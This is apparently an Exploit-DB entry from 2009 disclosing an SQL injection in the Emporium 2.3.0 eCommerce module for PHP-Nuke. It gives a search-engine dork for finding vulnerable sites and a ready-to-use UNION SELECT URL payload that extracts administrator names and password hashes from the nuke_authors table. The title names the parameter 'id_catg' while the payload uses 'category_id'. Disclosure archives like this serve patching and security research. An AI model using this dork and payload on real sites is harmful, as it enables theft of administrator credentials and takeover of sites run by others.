PHP-Nuke Module Emporium 2.3.0 - 'id_catg' SQL Injection

EDB-ID:

10615


Author:

Hussin X

Type:

webapps


Platform:

PHP

Date:

2009-12-23


||| PHP-Nuke Module Emporium 2.3.0 (id_catg) SQL Injection Vulnerability
||   Author: Hussin X
||   Home :  WwW.IQ-TY.CoM<http://WwW.IQ-TY.CoM>
||   email:  darkangel_g85[at]Yahoo[DoT]com
||| DorK   : inurl:modules.php?name=Shopping_Cart
||| more
 Module's Name: Emporium
 Module's Version: 2.3.0
 Module's Description: eCommerce for PHP-Nuke.
 License: Burnwave Emporium License
 Author's Name: Michael Squires
 Module's Download  http://www.burnwave.com/


 Exploit
________

http://server/modules.php?name=Shopping_Cart&file=category&category_id=4+uNioN+sElEcT+'IQ-SecuritY',aid,pwd+from+nuke_authors--




end.

IQ-SecuritY FoRuM